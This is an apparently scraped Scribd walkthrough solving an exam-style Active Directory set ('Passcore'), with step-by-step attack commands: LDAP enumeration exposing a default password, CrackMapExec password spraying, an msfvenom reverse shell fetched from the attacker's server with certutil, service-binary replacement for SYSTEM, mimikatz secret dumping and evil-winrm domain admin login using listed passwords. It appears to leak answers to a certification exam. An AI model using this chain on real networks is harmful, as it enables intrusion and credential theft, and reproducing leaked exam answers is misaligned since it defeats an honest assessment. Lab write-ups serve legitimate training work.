Scribd
Upload
229 views

Examsupports ONE

Uploaded by

ron.lazyguy99
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
229 views

Examsupports ONE

Uploaded by

ron.lazyguy99
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

MS01-v1 (Passcore)

AD Set 1 MS01-V1 - PASSCORE

192.168.xx.100 - DC01

192.168.xx.101 - MS02

192.168.xx.102 - MS01

192.168.xxx.100

Initial Access to the machine getting USERNAME and PASSWORD for


SSH

Run nmap with ldap script for getting default password which is ESMWaterP1p3S!

1. Default Password: ESMWaterP1p3S!

kali@kali:$ sudo nmap -sCV -T4 -oA nmap/inital --script "ldap* and not
brute" 192.168.xxx.100

We will get some open ports 389 (ldap) will be one of them and using ldapsearch we will get
usernames list and We can also get Default Password Here

2. Usernames And Password

kali@kali:$ sudo ldapsearch -H ldap://192.168.xx.100 -D -w -bx


"DC=oscp,DC=exam" > data.txt

create new usernames.txt with all user which are found in ldapsearch
we will get usernames and password after running this query save in new file usernames.txt

3. Password Sprays on all macines using CrackMapExec


# smb
kali@kali:$ sudo cme smb 192.168.xx.100 -u usernames.txt -p 'ESMWaterP1p3S!'

# smb
kali@kali:$ sudo cme smb 192.168.xx.101 -u usernames.txt -p 'ESMWaterP1p3S!'

# ssh
kali@kali:$ sudo cme ssh 192.168.xx.102 -u usernames.txt -p 'ESMWaterP1p3S!'

Now we have a valid credential on all 3 machines, it’s Ketty.Agan:ESMWaterP1p3S!

192.168.xxx.102

4. Ketty.Agan user shell on 192.168.xxx.102

# password - ESMWaterP1p3S!
kali@kali:$ ssh [email protected]

Privilege Escalation Insecure Service Executables

After running winpeas we will get "C:\Program Files\Pipes Printing Service\PipesPrinting.exe" and
we WriteData/CreateFiles permission on this directory

5. Generate Reverse Shell using msfvenom

kali@kali:$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your IP>


LPORT=9001 -f exe -o shell.exe

6. Start python http server on your Machine

kali@kali:$ sudo python3 -m http.server 80

7. Downloading shell.exe in machine

PS C:\Users\ketty.agan\Desktop> certutil -urlcache -f -split


http://192.168.xx.xx/shell.exe shell.exe

Now move/rename the PipesPrinting.exe to any Random name temp.exe


8. Moving/Renaming PipesPrinting.exe file and placing our Reverse Shell

# Rename
PS C:\Users\ketty.agan\Desktop> move "C:\Program Files\Pipes Printing
Service\PipesPrinting.exe" temp.exe

# Placing our payload


PS C:\Users\ketty.agan\Desktop> move "C:\Users\ketty.agan\Desktop\shell.exe"
"C:\Program Files\Pipes Printing Service\PipesPrinting.exe"

9. Start nc listner

kali@kali:$ nc -lnvp 9001

10. restart service to get system user shell of attacker box

PS C:\Users\ketty.agan\Desktop> shutdown /r

after that we will get system shell on box now we can use mimikatz.exe for Dumping Passwords

Post Exploitation

11. Downloading mimikatz.exe to box

PS C:\Users\Public> certutil -urlcache -f -split


http://192.168.xx.xx/mimikatz.exe mimikatz.exe

12. Dumping Password using mimikatz.exe

PS C:\Users\Public> mimikatz.exe
token::elevate
lsadump::secrets

Here we will get user Liv.Ungley's Password


Liv.Ungley's Password is RockYou!
192.168.xxx.101

13. Use Remmina or xfreerdp to login to the system

kali@kali:$ xfreerdp /v:192.168.xx.101 /u:liv.ungley /p:'RockYou!'

After connecting we can see there's a appsettings.json file in C:\Passcore directory

14. Getting Hardcoded Password from appsettings.json file

PS C:\Passcore> type appsettings.json

We will get G3x56wGq9fItu166 Domain Admin Password

15. getting domain admin shell using evil-winrm

192.168.xx.100
kali@kali:$ evil-winrm -i 192.168.xx.100 -u passcore -p 'G3x56wGq9fItu166'

And we have Compromised Full AD Domain... Here you can read last proof.txt

You might also like